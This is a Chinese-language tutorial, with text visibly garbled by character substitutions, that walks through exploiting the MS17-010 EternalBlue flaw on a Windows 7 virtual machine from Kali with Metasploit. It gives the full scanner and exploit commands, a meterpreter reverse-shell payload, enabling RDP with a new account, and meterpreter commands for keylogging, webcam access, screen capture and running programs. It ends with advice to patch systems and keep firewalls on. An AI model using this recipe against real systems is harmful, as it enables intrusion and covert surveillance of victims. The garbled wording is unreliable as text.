当初很多用户还在应用 Win7 零碎,尽管我集体也十分喜爱 Win7,也抵赖这是一款十分经典的零碎。然而 Win7 曾经在往年 1 月份彻底进行了反对,也就是说永远也不会失去安全更新和补丁修复了。这对用户来说是极大的危险,如果有条件的话,还是请应用最新版的 Win10,并及时更新安全补丁,爱护电脑。
明天就来看看如何利用 Kali 来对 Win7 进行浸透。这里应用的工具是赫赫有名的 Metaspoit,集成了大量破绽浸透工具。其中天然有臭名远扬的永恒之蓝工具,它利用了 Windows 零碎的 SMB 破绽,破绽编号是 MS17-010。具体原理其实我也不分明,然而大家只有晓得这些破绽十分危险就能够了。
筹备工作
筹备工作很简略,一个 Win7 虚拟机和一个 Kali 虚拟机即可。为了让 Kali 可能胜利浸透,Win7 零碎须要敞开防火墙。
扫描破绽
首先在 Kali 里启动 Metasploit 框架。
msfconsole
启动胜利之后,应该会进入 Metasploit 工具的命令行中,提示符为 msf5。
而后应用扫描工具扫描 ms10-010 破绽,RHOSTS 填写 Win7 虚拟机的 IP 地址。
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.229.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
留神工具的运行后果,如果呈现了相似绿框中的输入,那么就阐明破绽扫描胜利,能够进行下一步的浸透工作了。如果 Win7 防火墙是开启的,是无奈扫描到破绽的。这也从另一个侧面来证实防火墙的爱护作用。
浸透零碎
通过扫描证实了 Win7 零碎中存在破绽,下一步天然是通过对应的浸透工具进行浸透。其中 RHOSTS 是近程 IP,也就是 Win7 的 IP 地址,而 LHOSTS 是本地 Kali 零碎的 IP 地址。
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.229.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.229.131
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
稍等片刻,如果浸透胜利,那么就会呈现 meterpreter 提示符。这时候能够输出 getuid
命令查看一下以后零碎的用户。
开启远程桌面
浸透胜利之后,就能够应用得心应手的进行各种操作了。如果想要简略一点,能够开启远程桌面,间接控制目标电脑。开启 RDP 的时候须要创立一个用户。
meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456
而后在 Kali 中关上一个新的终端,输出命令开启远程桌面。
rdesktop 192.168.229.129
而后输出下面设置的用户名和明码即可连贯到指标计算机。
当然,这种办法的问题就是因为 Windows 零碎是单用户的零碎,以后登录的用户会看到远程桌面的登录提醒,从而裸露渗透者。
后盾监听
其实如果浸透胜利,进入了 meterpreter 提示符状态的话,也不须要这么麻烦。因为 meterpreter 自带了很多命令,包含上传文件、执行程序、监听键盘鼠标摄像头等等,齐全足以获取指标用户的任何信息。
screenshot 命令能够获取以后的零碎截图。
upload 命令能够上传文件,这里我间接把刚刚的屏幕截图上传上去了。上传的指标地位在 C:\Windows\System32
里。
webcam_stream 命令能够关上指标计算机的摄像头。
screenshare 能够实时查看用户的以后屏幕内容。
keyscan 命令能够监听用户的键盘操作。
最初是 execute 命令能够执行指标计算机上的任意程序。
以上这些命令配合应用,即可实现整个浸透过程,从方方面面获取指标用户的信息。
当然,通过本篇内容,相比大家也明确了系统漏洞对用户的危害有多大了吧。为了尽可能的缩小破绽对咱们的影响,我举荐大家永远应用最新版的操作系统并及时更新安全补丁,不要敞开更新和防火墙,装置并确保杀毒软件失常运行,不运行奇怪的程序。这样能够很大水平上防止不法分子黑入咱们的电脑。